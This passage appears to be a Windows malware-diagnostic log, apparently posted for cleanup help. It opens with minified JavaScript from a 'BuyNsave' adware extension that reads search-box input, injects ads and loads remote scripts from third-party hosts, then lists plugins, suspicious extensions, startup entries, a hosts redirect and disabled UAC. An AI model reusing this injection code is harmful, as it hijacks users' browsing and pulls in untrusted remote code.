validate:function(){return!0}},yelp:{unique_search_divs:\"1\",urls:[\"http://www.yelp.com/search?find_desc=*\"],src_for_keyword:\"input#find_desc\",validate:function(){b.num_of_items_in_one=1;return!0}},yellowpages:{unique_search_divs:\"1\",urls:[\"http://www.yellowpages.com/search?search_terms=*\"],src_for_keyword:\"input[type='text']#query\",validate:function(){return!0}},info:{unique_search_divs:\"1\",urls:[\"http://www.info.com/search?*\"],src_for_keyword:\"input[type='text']#qkw0\",validate:function(){return!0}}, webcrawler:{unique_search_divs:\"1\",urls:[\"http://www.webcrawler.com/search/web?*\"],src_for_keyword:\"input[type='text']#topSearchTextBox\",validate:function(){return!0}},webssearches:{unique_search_divs:\"1\",urls:[\"http://search.webssearches.com/search/web?*\",\"http://istart.webssearches.com/web/?q=*\",\"http://istart.webssearches.com/web?q=*\"],src_for_keyword:[\"input[type='search']#topSearchTextBox\",\"input[type='text']#q\"],validate:function(){b.num_of_items_in_one=2;return!0}},mywebsearch:{unique_search_divs:\"1\", urls:[\"http://search.mywebsearch.com/mywebsearch/*\"],src_for_keyword:[\"input#q\"],validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e); g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b= 0;b<a.cache.length;b++)a.remove.apply(a,a.cache[b]);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f= b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"== a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop(c))c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1, 1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)\"string\"===typeof a[b]&&(a[b]=a[b].replace(/\\\"/g,'\\\\\"'));return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&& (c=b.escape_chars_for_json(c));a=JSON.stringify(a);d=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(var e=0;e<d.length;e++)a=a.replace(RegExp(\"\\\\[##\"+d[e].replace+\"##\\\\]\",\"g\"),d[e][\"with\"]);try{return\"undefined\"!==typeof c.pxl&&\"\"!==c.pxl&&b.utils.sendPixels(c.pxl),JSON.parse(a)}catch(f){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling): a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k[b]))return k[b];return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault? b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var n=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts[b].selector),\"undefined\"!==typeof a.element){a.insert=a.inserts[b].at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(var e=0;e<b.num_of_items_in_one&&0!=c.length;e++){var f=b.get_item_json(a,c[0]);try{b.insert_point.children.push(f)}catch(g){b.insert_point= d,b.insert_point.children.push(f)}\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()}};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(n);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g= 0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;n=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom);if(!c.match(/\\[##eid##\\]/))return a;c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse(c);return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&& b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node=b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)}, !1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a;if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if(c)for(var d=0;d<c.length;d++)b.events.add(\"click\",function(){try{var b=a(this)}catch(c){}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl, b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href, b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(), !1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]); b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler(c),__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+ \"&hid=11783967167233671948&eid=78&pid=21566&prid=186\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){\"\"!= a&&(window.__yael_res=JSON.parse(a),window.__yael_res.config.targets.header.num_of_items_in_one&&(b.num_of_items_in_one=window.__yael_res.config.targets.header.num_of_items_in_one),\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler(c),__yael.inject_search()))})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1, b.inputElement,!1)}};;new function(){if(!(document.getElementById(\"sdjksjsksjdskjd__0\")||window.self!=window.top||-1<location.host.indexOf(\"google.com\")||-1<location.host.indexOf(\"bing.com\")||-1<location.host.indexOf(\"yahoo.com\"))){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.setAttribute(\"id\",\"sdjksjsksjdskjd__0\");a.src=\"//cdncache-a.akamaihd.net/loaders/1750/l.js?aoi=1311798366&pid=1750&zoneid=458516&ext=BuyNsave&systemid=11783967167233671948&ext=BuyNsave\";document.getElementsByTagName(\"head\")[0].appendChild(a)}};;new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=78_21566&hid=11783967167233671948&bname=BuyNsave\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=78_21566&hid=11783967167233671948&bname=BuyNsave\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1748/l.js?aoi=1311798366&pid=1748&zoneid=458516&ext=BuyNsave&systemid=11783967167233671948&ext=BuyNsave\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&5>parseInt(\"1\")&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://r.searchfun.in/?g=Azm9CdOLv6D6DG4ZhyqZC7YKg70Jv6qTCMVEDc0EgeqRg6bJvNbOCd0GojsGrjUErchXCMhMofb5vNbIDeDPBMY%3D\");var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch(c){}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1749/l.js?aoi=1311798366&pid=1749&zoneid=458516&ext=BuyNsave&systemid=11783967167233671948&ext=BuyNsave\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;try{new function(){if(null==document.getElementById(\"id_ad5cbe0b719874f1\")&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"http://istatic.datafastguru.info/fo/min/wpgb.js?bname=BuyNsave&subid=78_21566\";a.setAttribute(\"id\",\"id_ad5cbe0b719874f1\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;(function(){if(!document.getElementById(\"qwejkhjkshdfs_4\")&&window.self==window.top){var a=document.createElement(\"script\");a.id=\"inj_grazit_script_starter\";a.type=\"text/javascript\";a.src=\"//ext1.engageya.com/widget/inject_spark/inj_sprk_starter.js?pid=LTEsMTQyNTU5LDk0NjA4LDU0OTcx&subid=78_21566&appname=BuyNsave\";a.setAttribute(\"id\",\"qwejkhjkshdfs_4\");document.getElementsByTagName(\"head\")[0].appendChild(a)}})();;new function(){if(null==document.getElementById(\"id_a922982530c\")&&window.self==window.top){var a=document.createElement(\"script\");a.setAttribute(\"type\",\"text/javascript\");a.setAttribute(\"id\",\"id_a922982530c\");a.setAttribute(\"src\",\"https://client.foxydeal.com/sf/1054/78X21566/\"+document.location.hostname+\"?partnerName=BuyNsave\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;try{new function(){if(null==document.getElementById(\"id_a02b170eff6bb769\")&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//cjs.linkbolic.com/scjs/cjs/ctxjs.js?aff_id=1151&subaff_id=78_21566&sbrand=BuyNsave\";a.setAttribute(\"id\",\"id_a02b170eff6bb769\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};})();}catch(e){}");
FF - user.js - File not found
 
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_246.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@erdas.com/ERDAS Image Web Server ECW JPEG2000 Plugin,version=14.0: C:\Program Files (x86)\ERDAS\Image Web Server\Firefox Chrome Plug-in\NP_NCS6.dll (ERDAS)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~2\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3505.0912: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@myvr-software.com/npmMap,version=14.0.0.210: C:\Program Files (x86)\ERDAS\Image Web Server\Firefox Chrome Plug-in\npmMap.WebPlugin.Release.Win32.dll (Intergraph/myVR software AS)
FF - HKLM\Software\MozillaPlugins\@photodex.com/PhotodexPresenter: C:\Program Files (x86)\Photodex Presenter\npPxPlay.dll ( )
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect: C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll (Adobe Systems)
FF - HKCU\Software\MozillaPlugins\@citrixonline.com/appdetectorplugin: C:\Users\dkoloszc\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 33.1.1\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 33.1.1\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
FF - HKEY_LOCAL_MACHINE\software\mozilla\Thunderbird\Extensions\\msktbird@mcafee.com: C:\Program Files\McAfee\MSK
 
[2014-02-04 13:34:08 | 000,000,000 | ---D | M] (No name found) -- C:\Users\dkoloszc\AppData\Roaming\mozilla\Extensions
[2014-12-23 12:11:25 | 000,000,000 | ---D | M] (No name found) -- C:\Users\dkoloszc\AppData\Roaming\mozilla\Firefox\Profiles\cfd18su2.default\extensions
[2014-12-23 12:11:24 | 000,000,000 | ---D | M] (BuyuNssaeve) -- C:\Users\dkoloszc\AppData\Roaming\mozilla\Firefox\Profiles\cfd18su2.default\extensions\aN@B.com
[2014-12-23 12:11:25 | 000,000,000 | ---D | M] (YeoutubeAdBlocke) -- C:\Users\dkoloszc\AppData\Roaming\mozilla\Firefox\Profiles\cfd18su2.default\extensions\Oj@jEI.com
[2014-11-26 12:34:08 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014-11-26 12:34:08 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
[color=#E56717]========== Chrome  ==========[/color]
 
CHR - default_search_provider:  (Enabled)
CHR - default_search_provider: search_url = 
CHR - default_search_provider: suggest_url = 
CHR - homepage: http://www.google.pl/
CHR - plugin: Error reading preferences file
CHR - Extension: Awesome Screenshot: Capture & Annotate = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\alelhddbbhepgpmgidjdcjakblofbmce\3.7.21_0\
CHR - Extension: Google Docs = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\
CHR - Extension: Google Drive = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: Google Voice Search Hotword (Beta) = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5023_0\
CHR - Extension: YouTube = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Google Search = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: Axure RP Extension for Chrome = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\dogkpdfcklifaemcdfbildhcofnopogp\0.6.2_0\
CHR - Extension: Cisco WebEx Extension = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlhmfgmfgeifomenelglieieghnjghma\1.0.1_0\
CHR - Extension: Google Wallet = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Gmail = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\
 
O1 HOSTS File: ([2014-08-22 10:02:25 | 000,000,852 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 74.208.10.249 gs.apple.com
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (WebEx Productivity Tools) - {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} - C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O3 - HKLM\..\Toolbar: (WebEx Productivity Tools) - {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} - C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC)
O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O4 - HKLM..\Run: [Adobe Creative Cloud] C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [DameWare MRC Agent] C:\Windows\SysWOW64\DWRCST.EXE (DameWare Development)
O4 - HKLM..\Run: [Dell Webcam Central] C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe (Creative Technology Ltd)
O4 - HKLM..\Run: [emsisoft anti-malware] c:\program files (x86)\emsisoft anti-malware\a2guard.exe (Emsisoft GmbH)
O4 - HKLM..\Run: [IMSS] C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IMSS\PIconStartup.exe (Intel Corporation)
O4 - HKLM..\Run: [OfficeScanNT Monitor] C:\Program Files (x86)\Trend Micro\OfficeScan Client\pccntmon.exe (Trend Micro Inc.)
O4 - HKLM..\Run: [Syncios device service] C:\Program Files (x86)\Syncios\SynciosDeviceService.exe ()
O4 - HKLM..\Run: [USB3MON] C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe (Intel Corporation)
O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-29074177-2114273088-3454551869-225919..\Run: [Akamai NetSession Interface] C:\Users\dkoloszc\AppData\Local\Akamai\netsession_win.exe (Akamai Technologies, Inc.)
O4 - HKU\S-1-5-21-29074177-2114273088-3454551869-225919..\Run: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
O4 - HKU\S-1-5-21-29074177-2114273088-3454551869-225919..\Run: [PTIM.exe] C:\Program Files (x86)\WebEx\Productivity Tools\PTIM.exe (Cisco WebEx LLC)
O4 - HKU\S-1-5-21-29074177-2114273088-3454551869-225919..\Run: [PTOneClick] C:\Program Files (x86)\WebEx\Productivity Tools\ptoneclk.exe (Cisco WebEx LLC)
O4 - HKU\S-1-5-21-29074177-2114273088-3454551869-225919..\Run: [RESTART_STICKY_NOTES] C:\Windows\System32\StikyNot.exe File not found
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-21-29074177-2114273088-3454551869-225919..\RunOnce: [Adobe Speed Launcher] 1419332630 File not found
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O7 - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O10 - NameSpace_Catalog5\Catalog_Entries\000000000010 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O13 - gopher Prefix: missing
O15 - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\..Trusted Domains: intergraph.com ([siebweb] https in Trusted sites)
O16 - DPF: {1A0D4CE0-0F53-4A04-AD6E-1B4F3D9285D8} https://siebweb.intergraph.com/service_enu/23021/applets/SiebelAx_Calendar.cab (Siebel Calendar)
O16 - DPF: {3ED06114-4AE2-40E0-AFB5-EB93E9FB71EE} https://siebweb.intergraph.com/service_enu/23030/applets/SiebelAx_Calendar.cab (Siebel Calendar)
O16 - DPF: {4202FDF9-F479-4975-9359-7CA11CEF570A} https://siebweb.intergraph.com/service_enu/23030/applets/SiebelAx_HI_Client.cab (Siebel High Interactivity Framework)
O16 - DPF: {4AAC6220-904F-40BD-B073-C1B8FB022156} https://siebweb.intergraph.com/service_enu/23030/applets/SiebelAx_Calendar.cab (Siebel Calendar)
